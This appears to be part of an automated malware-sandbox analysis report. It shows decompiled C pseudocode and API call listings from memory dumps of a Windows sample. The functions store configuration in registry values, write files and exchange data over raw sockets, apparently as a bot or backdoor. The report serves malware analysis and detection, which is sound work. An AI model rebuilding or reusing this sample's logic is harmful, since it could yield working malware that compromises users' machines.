                                • Instruction ID: 6aa3410bacb93a3b3b59f2bbcd5c8469b52ae131e7bb61eea35a287d4c81699d
                                • Opcode Fuzzy Hash: 225f390e193556fcb4ff1b2b4ee522b6ef21893757a80cadbb82ccc3195009c3
                                • Instruction Fuzzy Hash: 241107B0950228EBDB24CFD4DCC8BE9B3B4BB48308F6441C9D10A66285D7749BD4CF54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02205AB4() {
                                				long _t52;
                                				char _t53;
                                				signed int _t57;
                                				void* _t79;
                                				void* _t81;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					 *(_t79 - 0x22c) =  *(_t79 - 0x22c) + 1;
                                					L5:
                                					while(1) {
                                						L5:
                                						if( *(_t79 - 0x22c) < 5) {
                                							L6:
                                							_t53 = "alfoC:\\Windows\\"; // 0x6f666c61
                                							wsprintfA(_t79 - 0x10c, "%c%d_%d", _t53,  *(_t79 - 0x22c),  *(_t79 - 0x228));
                                							_t81 = _t81 + 0x14;
                                							 *(_t79 - 0x21c) = 4;
                                							 *(_t79 - 0x218) = 0;
                                							if(RegQueryValueExA( *(_t79 - 0x230), _t79 - 0x10c, 0, 0, _t79 - 0x218, _t79 - 0x21c) == 0) {
                                								L8:
                                								_t57 = "alfoC:\\Windows\\"; // 0x6f666c61
                                								 *(_t79 - 0x218) =  *(_t79 - 0x218) ^ _t57 *  *(_t79 - 0x228);
                                								 *(_t79 - 0x238) =  *(_t79 - 0x22c);
                                								 *(_t79 - 0x238) =  *(_t79 - 0x238) - 1;
                                								if( *(_t79 - 0x238) <= 3) {
                                									L9:
                                									switch( *((intOrPtr*)( *(_t79 - 0x238) * 4 +  &M02205C16))) {
                                										case 0:
                                											L10:
                                											 *( *(_t79 - 0x224)) =  *(_t79 - 0x218);
                                											goto L14;
                                										case 1:
                                											L11:
                                											 *((short*)( *((intOrPtr*)(__ebp - 0x224)) + 4)) =  *((intOrPtr*)(__ebp - 0x218));
                                											goto L14;
                                										case 2:
                                											L12:
                                											 *((intOrPtr*)( *((intOrPtr*)(__ebp - 0x224)) + 8)) =  *((intOrPtr*)(__ebp - 0x218));
                                											goto L14;
                                										case 3:
                                											L13:
                                											 *((intOrPtr*)( *((intOrPtr*)(__ebp - 0x224)) + 0xc)) =  *((intOrPtr*)(__ebp - 0x218));
                                											goto L14;
                                									}
                                								}
                                								L14:
                                								goto L0;
                                							} else {
                                								L7:
                                								 *(_t79 - 0x220) = 0;
                                							}
                                						}
                                						L15:
                                						( *(_t79 - 0x224))[0x10] = 0;
                                						L1:
                                						_t52 =  *(_t79 - 0x228) + 1;
                                						 *(_t79 - 0x228) = _t52;
                                						 *(_t79 - 4) =  &(( *(_t79 - 4))[0x14]);
                                						if( *(_t79 - 0x220) != 0 &&  *(_t79 - 0x228) < 0x3e8) {
                                							L4:
                                							 *(_t79 - 0x224) =  *(_t79 - 4);
                                							 *(_t79 - 0x22c) = 1;
                                							continue;
                                						}
                                						L16:
                                						if( *(_t79 - 0x230) != 0) {
                                							_t52 = RegCloseKey( *(_t79 - 0x230)); // executed
                                						}
                                						L18:
                                						return _t52;
                                						L19:
                                					}
                                				}
                                			}








                                0x02205ab4
                                0x02205ab4
                                0x02205ab4
                                0x02205abd
                                0x00000000
                                0x02205ac3
                                0x02205ac3
                                0x02205aca
                                0x02205ad0
                                0x02205ade
                                0x02205af0
                                0x02205af6
                                0x02205af9
                                0x02205b03
                                0x02205b35
                                0x02205b46
                                0x02205b46
                                0x02205b5a
                                0x02205b66
                                0x02205b75
                                0x02205b82
                                0x02205b84
                                0x02205b8a
                                0x00000000
                                0x02205b91
                                0x02205b9d
                                0x00000000
                                0x00000000
                                0x02205ba1
                                0x02205bae
                                0x00000000
                                0x00000000
                                0x02205bb4
                                0x02205bc0
                                0x00000000
                                0x00000000
                                0x02205bc5
                                0x02205bd1
                                0x00000000
                                0x00000000
                                0x02205b8a
                                0x02205bd4
                                0x00000000
                                0x02205b37
                                0x02205b37
                                0x02205b37
                                0x02205b37
                                0x02205b35
                                0x02205bd9
                                0x02205bdf
                                0x02205a6a
                                0x02205a70
                                0x02205a73
                                0x02205a7f
                                0x02205a89
                                0x02205a9f
                                0x02205aa2
                                0x02205aa8
                                0x00000000
                                0x02205aa8
                                0x02205beb
                                0x02205bf2
                                0x02205bfb
                                0x02205bfb
                                0x02205c01
                                0x02205c05
                                0x00000000
                                0x02205c05
                                0x02205ac3

                                APIs
                                • wsprintfA.USER32 ref: 02205AF0
                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 02205B2D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: QueryValuewsprintf
                                • String ID: %c%d_%d$alfoC:\Windows\
                                • API String ID: 2072284396-3403567818
                                • Opcode ID: 23fb1be509931c6f7c2338fdc2165cfedafb6c97624e48347937f80c1f7c144a
                                • Instruction ID: 4a75d6250965d9dfdb99ad177a64fa7bea5755963fb044e8fa684ae34efebd60
                                • Opcode Fuzzy Hash: 23fb1be509931c6f7c2338fdc2165cfedafb6c97624e48347937f80c1f7c144a
                                • Instruction Fuzzy Hash: B3011EB5950128EBDB20CFD5DC88BE9B3B8BB18304F5045C8E10AA6285D7749BD4CF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 44%
                                			E022082B6(void* __eflags, char _a4, signed int _a8) {
                                				long _v128;
                                				void _v131;
                                				signed int _v132;
                                				short _v134;
                                				int _v138;
                                				int _v142;
                                				char _v144;
                                				short _v146;
                                				char _v148;
                                				intOrPtr _v152;
                                				signed int _t36;
                                				intOrPtr _t40;
                                
                                				_v148 = 0;
                                				_v146 = 0;
                                				_v142 = 0;
                                				_v138 = 0;
                                				_v134 = 0;
                                				_v132 = 0;
                                				memset( &_v131, 0, 0x1f << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v152 = 0;
                                				_v148 = 2;
                                				_v146 =  *0x21e11b8((_a8 & 0x0000ffff) + 0x13);
                                				E0221772B( &_v144,  &_a4, "true");
                                				_t36 = E022044CB((_a8 & 0x0000ffff) + 0x13);
                                				asm("cdq");
                                				_v132 = (_t36 & 0x0000ffff) % 0x3e8;
                                				_v128 = GetTickCount();
                                				_t40 = E02207C4E( &_v148, 0x61a8);
                                				_v152 = _t40;
                                				if(_v152 != 0) {
                                					_t40 =  *0x21e11d4(_v152,  &_v132, 8, 0);
                                					_t64 = _t40 - 0xffffffff;
                                					if(_t40 != 0xffffffff) {
                                						_t40 = E0220811C(_t64, _v152, 0);
                                					}
                                				}
                                				if(_v152 == 0 || _v152 == 0xffffffff) {
                                					return _t40;
                                				} else {
                                					return  *0x21e11f0(_v152);
                                				}
                                			}















                                0x022082c0
                                0x022082cb
                                0x022082d1
                                0x022082d7
                                0x022082dd
                                0x022082e4
                                0x022082f2
                                0x022082f4
                                0x022082f6
                                0x022082f7
                                0x02208301
                                0x0220831d
                                0x02208331
                                0x02208339
                                0x02208343
                                0x0220834b
                                0x02208354
                                0x02208363
                                0x0220836b
                                0x02208378
                                0x02208389
                                0x0220838f
                                0x02208392
                                0x0220839d
                                0x022083a2
                                0x02208392
                                0x022083ac
                                0x022083c8
                                0x022083b7
                                0x00000000
                                0x022083be

                                APIs
                                • htons.WS2_32(?), ref: 02208317
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • GetTickCount.KERNEL32 ref: 0220834E
                                  • Part of subcall function 02207C4E: socket.WS2_32(00000002,00000001,00000006), ref: 02207C83
                                • send.WS2_32(00000000,00000000,00000008,00000000), ref: 02208389
                                  • Part of subcall function 0220811C: GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 022081A1
                                  • Part of subcall function 0220811C: recv.WS2_32(00000000,00000008,00000400,00000000), ref: 022081F0
                                  • Part of subcall function 0220811C: GlobalFree.KERNEL32(00000000), ref: 02208247
                                  • Part of subcall function 0220811C: closesocket.WS2_32(000000FF), ref: 02208283
                                • closesocket.WS2_32(000000FF), ref: 022083BE
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Globalclosesocket$AllocCountExchangeFreeInterlockedTickhtonsrecvsendsocket
                                • String ID:
                                • API String ID: 1332007968-0
                                • Opcode ID: 3caca7adaf6846ce29b73805a2fa1cdf33695f928787d17ae5c1631a7d91c383
                                • Instruction ID: a6e06b43a553a0073a99da4b869967c898c4eaacaf65eada9c5f7251736237ca
                                • Opcode Fuzzy Hash: 3caca7adaf6846ce29b73805a2fa1cdf33695f928787d17ae5c1631a7d91c383
                                • Instruction Fuzzy Hash: DF21A071D103189AEF20DBB8CC46BAEB7B5BF44300F0046A9E20CA61C2EB744A958F51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E022045D2(CHAR* _a4, void* _a8, long _a12) {
                                				void* _v8;
                                				long _v12;
                                				void* _t13;
                                
                                				_v12 = 0;
                                				DeleteFileA(_a4);
                                				_t13 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x20, 0);
                                				_v8 = _t13;
                                				if(_v8 != 0xffffffff) {
                                					WriteFile(_v8, _a8, _a12,  &_v12, 0);
                                					return CloseHandle(_v8);
                                				}
                                				return _t13;
                                			}






                                0x022045d8
                                0x022045e3
                                0x022045fc
                                0x02204602
                                0x02204609
                                0x0220461d
                                0x00000000
                                0x02204627
                                0x02204630

                                APIs
                                • DeleteFileA.KERNEL32(?), ref: 022045E3
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 022045FC
                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0220461D
                                • CloseHandle.KERNEL32(?), ref: 02204627
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: File$CloseCreateDeleteHandleWrite
                                • String ID:
                                • API String ID: 656945655-0
                                • Opcode ID: 7ce773de6b95cd92205787ea9f5a52924d9644a98536d88cca443f66b48bfd92
                                • Instruction ID: 84a3f58b1cae264c6e15e0218eaafe0cdb31d7ce00485f4b1121a14719a1f07b
                                • Opcode Fuzzy Hash: 7ce773de6b95cd92205787ea9f5a52924d9644a98536d88cca443f66b48bfd92
                                • Instruction Fuzzy Hash: 36F0FF75A40308FBDB10DFE4DD4DF9E77B8AB48711F508644FA09AB2C0D6709A948B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00001000), ref: 02211EA3
                                • RtlExitUserThread.NTDLL(00000000), ref: 02211EEA
                                  • Part of subcall function 02211D8F: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 02211DD7
                                  • Part of subcall function 02211D8F: RegEnumValueA.ADVAPI32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02211E14
                                  • Part of subcall function 02211D8F: RegCloseKey.ADVAPI32(?), ref: 02211E90
                                • Sleep.KERNEL32(00004E20), ref: 02211EC6
                                  • Part of subcall function 02211D8F: GetFileAttributesA.KERNEL32(00000000), ref: 02211E3D
                                  • Part of subcall function 02211D8F: Sleep.KERNEL32(00000100), ref: 02211E73
                                • Sleep.KERNEL32(00057E40), ref: 02211EE0
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
                                • String ID:
                                • API String ID: 3734488975-0
                                • Opcode ID: 48641b9307068bcc1abccd468ba59461787981778a204eca1c1194d3ad169274
                                • Instruction ID: 9f66321de92bbf80388f0dd796ae95ef545306deaa025b46ebb6d008050f0f4b
                                • Opcode Fuzzy Hash: 48641b9307068bcc1abccd468ba59461787981778a204eca1c1194d3ad169274
                                • Instruction Fuzzy Hash: D7E01BF9994304F7E60067F0BC09F5736D65759745F844864FB0D4D284D6F2D8708652
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 022080DA
                                • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 022080F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: recvselect
                                • String ID: @
                                • API String ID: 741273618-2766056989
                                • Opcode ID: 926524f81c53962bd1ac21a639190c77417a8bb1ff0bee74b0a30464a7691062
                                • Instruction ID: e72d3809b689ab49e1c08ea069d956eecce3d798787559a11e424dc6cb2edcec
                                • Opcode Fuzzy Hash: 926524f81c53962bd1ac21a639190c77417a8bb1ff0bee74b0a30464a7691062
                                • Instruction Fuzzy Hash: A7411D70A1421CDBDB58CF94C891BEEB7B6AF94304F00C199D649A7285DBB56EC0CF92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E0220511E() {
                                				void* _t141;
                                				void* _t143;
                                				signed int _t150;
                                				void* _t185;
                                				void* _t187;
                                				void* _t188;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					 *(_t185 - 0x1634) =  *(_t185 - 0x1634) + 1;
                                					__eflags =  *(__ebp - 0x1634) - 8;
                                					if( *(__ebp - 0x1634) >= 8) {
                                						break;
                                					}
                                					L25:
                                					__eax = "alfoC:\\Windows\\"; // 0x6f666c61
                                					__eax = __eax *  *(__ebp - 0x1634);
                                					__ecx = __ebp - 0x120;
                                					__eax = wsprintfA(__ebp - 0x120, 0x2203c54, __eax);
                                					__esp = __esp + 0xc;
                                					__eflags =  *(__ebp - 0x1634) - 5;
                                					if( *(__ebp - 0x1634) > 5) {
                                						L29:
                                						 *(__ebp - 0x1630) = 0x400;
                                						 *(__ebp - 0x162c) = 0;
                                						__eax = __ebp - 0x1630;
                                						__ecx = __ebp - 0x162c;
                                						__eax =  *(__ebp - 0x1638);
                                						__eax = RegQueryValueExA( *(__ebp - 0x1638), __ebp - 0x120, 0, 0, __ebp - 0x162c, __ebp - 0x1630);
                                						__eflags = __eax;
                                						if(__eax == 0) {
                                							goto L31;
                                						} else {
                                							L30:
                                							goto L1;
                                						}
                                					} else {
                                						L26:
                                						 *(__ebp - 0x1630) = 4;
                                						__eax = __ebp - 0x163c;
                                						__ecx = __ebp - 0x120;
                                						__eax = RegQueryValueExA( *(__ebp - 0x1638), __ebp - 0x120, 0, 0, __ebp - 0x163c, __ebp - 0x1630);
                                						__eflags = __eax;
                                						if(__eax == 0) {
                                							L28:
                                							L31:
                                							__ecx =  *(__ebp - 0x1634);
                                							 *(__ebp - 0x1648) =  *(__ebp - 0x1634);
                                							 *(__ebp - 0x1648) =  *(__ebp - 0x1648) - 1;
                                							__eflags =  *(__ebp - 0x1648) - 6;
                                							if( *(__ebp - 0x1648) <= 6) {
                                								L32:
                                								__eax =  *(__ebp - 0x1648);
                                								switch( *((intOrPtr*)( *(__ebp - 0x1648) * 4 +  &M02205486))) {
                                									case 0:
                                										L33:
                                										__ecx =  *(__ebp - 0x163c);
                                										 *(__ebp - 0x62c) =  *(__ebp - 0x163c);
                                										goto L40;
                                									case 1:
                                										L34:
                                										 *((char*)(__ebp - 0x628)) =  *(__ebp - 0x163c);
                                										goto L40;
                                									case 2:
                                										L35:
                                										 *((char*)(__ebp - 0x627)) =  *(__ebp - 0x163c);
                                										goto L40;
                                									case 3:
                                										L36:
                                										 *(__ebp - 0x626) =  *(__ebp - 0x163c);
                                										goto L40;
                                									case 4:
                                										L37:
                                										 *(__ebp - 0x624) =  *(__ebp - 0x163c);
                                										goto L40;
                                									case 5:
                                										L38:
                                										__eax = __ebp - 0x620;
                                										__ecx =  *(__ebp - 0x1630);
                                										__eax = E022049F9( *(__ebp - 0x1630), __ebp - 0x162c,  *(__ebp - 0x1630), __ebp - 0x620);
                                										goto L40;
                                									case 6:
                                										L39:
                                										__eax = __ebp - 0x220;
                                										__ecx =  *(__ebp - 0x1630);
                                										__eax = E022049F9( *(__ebp - 0x1630), __ebp - 0x162c,  *(__ebp - 0x1630), __ebp - 0x220);
                                										goto L40;
                                								}
                                							}
                                							L40:
                                							continue;
                                						} else {
                                							L27:
                                							L1:
                                							_t141 = GlobalAlloc(0x40, 0x10400); // executed
                                							 *(_t185 - 0x1640) = _t141;
                                							_t143 = E0220C89A( *(_t185 - 0x1640)); // executed
                                							_t188 = _t187 + 4;
                                							if(_t143 != 0) {
                                								_t143 = E02206330( *(_t185 - 0x1640) + 0x30ec,  *(_t185 - 0x1640) + 0x30ec,  *(_t185 - 0x1640) + 0x30ec, 0); // executed
                                								_t188 = _t188 + 8;
                                							}
                                							if( *0x2287da0 == 0) {
                                								L4:
                                								 *(_t185 - 0x1634) = 1;
                                								L6:
                                								while( *(_t185 - 0x1634) < 8) {
                                									_t150 = "alfoC:\\Windows\\"; // 0x6f666c61
                                									wsprintfA(_t185 - 0x120, 0x2203c50, _t150 *  *(_t185 - 0x1634));
                                									_t188 = _t188 + 0xc;
                                									 *(_t185 - 0x1644) =  *(_t185 - 0x1634);
                                									 *(_t185 - 0x1644) =  *(_t185 - 0x1644) - 1;
                                									if( *(_t185 - 0x1644) <= 6) {
                                										L8:
                                										switch( *((intOrPtr*)( *(_t185 - 0x1644) * 4 +  &M0220546A))) {
                                											case 0:
                                												L9:
                                												 *(_t185 - 0x163c) = 1;
                                												goto L16;
                                											case 1:
                                												L10:
                                												 *(__ebp - 0x163c) = 0;
                                												goto L16;
                                											case 2:
                                												L11:
                                												 *(__ebp - 0x163c) = 0;
                                												goto L16;
                                											case 3:
                                												L12:
                                												 *(__ebp - 0x163c) = 0x1e;
                                												goto L16;
                                											case 4:
                                												L13:
                                												 *(__ebp - 0x163c) = 0x8f;
                                												goto L16;
                                											case 5:
                                												L14:
                                												_push(0x8e);
                                												_push(0x21e2244);
                                												__eax = E02204A5B(__ecx, __eflags);
                                												__esp = __esp + 8;
                                												_push(__eax);
                                												_push(__ebp - 0x162c);
                                												__eax =  *0x21e1148();
                                												goto L16;
                                											case 6:
                                												L15:
                                												_push(0x81);
                                												_push(0x21e21c0);
                                												__eax = E02204A5B(__ecx, __eflags);
                                												__esp = __esp + 8;
                                												_push(__eax);
                                												__eax = __ebp - 0x162c;
                                												_push(__ebp - 0x162c);
                                												__eax =  *0x21e1148();
                                												goto L16;
                                										}
                                									}
                                									L16:
                                									if( *(_t185 - 0x1634) > 5) {
                                										RegSetValueExA( *(_t185 - 0x1638), _t185 - 0x120, 0, 1, _t185 - 0x162c,  *0x21e114c(_t185 - 0x162c));
                                									} else {
                                										RegSetValueExA( *(_t185 - 0x1638), _t185 - 0x120, 0, "true", _t185 - 0x163c, "true");
                                									}
                                									 *(_t185 - 0x1634) =  *(_t185 - 0x1634) + 1;
                                								}
                                								RegCloseKey( *(_t185 - 0x1638));
                                								 *( *(_t185 + 8)) = 1;
                                								( *(_t185 + 8))[1] = 0;
                                								( *(_t185 + 8))[1] = 0;
                                								( *(_t185 + 8))[1] = 0x1e;
                                								( *(_t185 + 8))[2] = 0x8f;
                                								E0221772B( &(( *(_t185 + 8))[3]), 0x21e2244, 0x8f);
                                								__eflags =  &(( *(_t185 + 8))[0x103]);
                                								_t143 = E0221772B( &(( *(_t185 + 8))[0x103]), 0x21e21c0, 0x82);
                                							}
                                							L21:
                                							__eflags =  *(_t185 - 0x1640);
                                							if( *(_t185 - 0x1640) != 0) {
                                								_t143 = GlobalFree( *(_t185 - 0x1640));
                                							}
                                							L23:
                                							 *((intOrPtr*)(_t185 - 4)) = 0xffffffff;
                                						}
                                					}
                                					L48:
                                					 *[fs:0x0] =  *((intOrPtr*)(_t185 - 0x10));
                                					return _t143;
                                					L49:
                                				}
                                				L41:
                                				__eflags =  *(__ebp - 0x62c);
                                				if( *(__ebp - 0x62c) == 0) {
                                					L45:
                                					__eflags =  *(__ebp - 0x1638);
                                					if( *(__ebp - 0x1638) != 0) {
                                						__eax = RegCloseKey( *(__ebp - 0x1638));
                                					}
                                					 *((intOrPtr*)(__ebp - 4)) = 0xffffffff;
                                				} else {
                                					 *(__ebp - 0x1634) = 0;
                                					__eax = __ebp - 0x220;
                                					__ecx = __ebp - 0x162c;
                                					__eax = E0221772B(__ebp - 0x162c, __ebp - 0x220, 0x100);
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 0x100;
                                					__eax = __ebp - 0x62c;
                                					__ecx =  *(__ebp - 0x1634);
                                					E0221772B(__ebp +  *(__ebp - 0x1634) - 0x162c, __ebp - 0x62c, "true") =  *(__ebp - 0x1634);
                                					__eax =  *(__ebp - 0x1634) + 4;
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 4;
                                					__ecx =  *(__ebp - 0x1634);
                                					 *(__ebp +  *(__ebp - 0x1634) - 0x162c) =  *((intOrPtr*)(__ebp - 0x628));
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 1;
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 1;
                                					__ecx =  *(__ebp - 0x1634);
                                					 *(__ebp +  *(__ebp - 0x1634) - 0x162c) =  *((intOrPtr*)(__ebp - 0x627));
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 1;
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 1;
                                					__ecx = __ebp - 0x626;
                                					__ebp +  *(__ebp - 0x1634) - 0x162c = E0221772B(__ebp +  *(__ebp - 0x1634) - 0x162c, __ebp - 0x626, 2);
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 1;
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 1;
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 1;
                                					__eax = __ebp - 0x624;
                                					__ecx =  *(__ebp - 0x1634);
                                					E0221772B(__ebp +  *(__ebp - 0x1634) - 0x162c, __ebp - 0x624, "true") =  *(__ebp - 0x1634);
                                					__eax =  *(__ebp - 0x1634) + 4;
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) + 4;
                                					__ecx =  *(__ebp - 0x624);
                                					__eax =  *(__ebp - 0x1634);
                                					__ecx = __ebp +  *(__ebp - 0x1634) - 0x162c;
                                					__eax = E0221772B(__ebp +  *(__ebp - 0x1634) - 0x162c, __ebp - 0x620,  *(__ebp - 0x624));
                                					 *(__ebp - 0x1634) =  *(__ebp - 0x1634) +  *(__ebp - 0x624);
                                					__eax = __ebp - 0x162c;
                                					__eax = E02206330(__ecx, __eflags, __ebp - 0x162c, 0);
                                					__eflags = __eax;
                                					if(__eax == 0) {
                                						goto L1;
                                					} else {
                                						__ecx = __ebp - 0x62c;
                                						__eax = E0221772B(0x2287da0, __ebp - 0x62c, 0x50c);
                                						goto L45;
                                					}
                                				}
                                				goto L48;
                                			}









                                0x0220511e
                                0x0220511e
                                0x0220511e
                                0x02205127
                                0x0220512d
                                0x02205134
                                0x00000000
                                0x00000000
                                0x0220513a
                                0x0220513a
                                0x0220513f
                                0x0220514c
                                0x02205153
                                0x02205159
                                0x0220515c
                                0x02205163
                                0x022051a0
                                0x022051a0
                                0x022051aa
                                0x022051b1
                                0x022051b8
                                0x022051ca
                                0x022051d1
                                0x022051d7
                                0x022051d9
                                0x00000000
                                0x022051db
                                0x022051db
                                0x00000000
                                0x022051db
                                0x02205165
                                0x02205165
                                0x02205165
                                0x02205176
                                0x02205181
                                0x0220518f
                                0x02205195
                                0x02205197
                                0x0220519e
                                0x022051e0
                                0x022051e0
                                0x022051e6
                                0x022051f5
                                0x022051fb
                                0x02205202
                                0x02205208
                                0x02205208
                                0x0220520e
                                0x00000000
                                0x02205215
                                0x02205215
                                0x0220521b
                                0x00000000
                                0x00000000
                                0x02205223
                                0x02205229
                                0x00000000
                                0x00000000
                                0x02205231
                                0x02205237
                                0x00000000
                                0x00000000
                                0x0220523f
                                0x02205246
                                0x00000000
                                0x00000000
                                0x0220524f
                                0x02205255
                                0x00000000
                                0x00000000
                                0x0220525d
                                0x0220525d
                                0x02205264
                                0x02205272
                                0x00000000
                                0x00000000
                                0x0220527c
                                0x0220527c
                                0x02205283
                                0x02205291
                                0x00000000
                                0x00000000
                                0x0220520e
                                0x02205299
                                0x00000000
                                0x02205199
                                0x02205199
                                0x02204ee0
                                0x02204ee7
                                0x02204eed
                                0x02204efa
                                0x02204eff
                                0x02204f04
                                0x02204f15
                                0x02204f1a
                                0x02204f1a
                                0x02204f24
                                0x02204f2a
                                0x02204f2a
                                0x00000000
                                0x02204f45
                                0x02204f52
                                0x02204f6b
                                0x02204f71
                                0x02204f7a
                                0x02204f89
                                0x02204f96
                                0x02204f9c
                                0x02204fa2
                                0x00000000
                                0x02204fa9
                                0x02204fa9
                                0x00000000
                                0x00000000
                                0x02204fb5
                                0x02204fb5
                                0x00000000
                                0x00000000
                                0x02204fc1
                                0x02204fc1
                                0x00000000
                                0x00000000
                                0x02204fcd
                                0x02204fcd
                                0x00000000
                                0x00000000
                                0x02204fd9
                                0x02204fd9
                                0x00000000
                                0x00000000
                                0x02204fe5
                                0x02204fe5
                                0x02204fea
                                0x02204fef
                                0x02204ff4
                                0x02204ff7
                                0x02204ffe
                                0x02204fff
                                0x00000000
                                0x00000000
                                0x02205007
                                0x02205007
                                0x0220500c
                                0x02205011
                                0x02205016
                                0x02205019
                                0x0220501a
                                0x02205020
                                0x02205021
                                0x00000000
                                0x00000000
                                0x02204fa2
                                0x02205027
                                0x0220502e
                                0x0220507a
                                0x02205030
                                0x0220504b
                                0x0220504b
                                0x02204f3f
                                0x02204f3f
                                0x0220508c
                                0x02205095
                                0x0220509e
                                0x022050a5
                                0x022050ac
                                0x022050b5
                                0x022050cd
                                0x022050e2
                                0x022050e8
                                0x022050ed
                                0x022050f0
                                0x022050f0
                                0x022050f7
                                0x02205100
                                0x02205100
                                0x02205106
                                0x02205106
                                0x02205106
                                0x02205197
                                0x02205459
                                0x0220545c
                                0x02205469
                                0x00000000
                                0x02205469
                                0x0220529e
                                0x0220529e
                                0x022052a5
                                0x0220542a
                                0x0220542a
                                0x02205431
                                0x0220543a
                                0x0220543a
                                0x02205440
                                0x022052ab
                                0x022052ab
                                0x022052ba
                                0x022052c1
                                0x022052c8
                                0x022052dc
                                0x022052e4
                                0x022052eb
                                0x02205301
                                0x02205307
                                0x0220530a
                                0x02205310
                                0x0220531c
                                0x02205329
                                0x0220532c
                                0x02205332
                                0x0220533e
                                0x0220534b
                                0x0220534e
                                0x02205356
                                0x0220536b
                                0x02205379
                                0x0220537c
                                0x0220538b
                                0x02205393
                                0x0220539a
                                0x022053b0
                                0x022053b6
                                0x022053b9
                                0x022053bf
                                0x022053cd
                                0x022053d3
                                0x022053db
                                0x022053ef
                                0x022053f7
                                0x022053fe
                                0x02205406
                                0x02205408
                                0x00000000
                                0x0220540a
                                0x0220540f
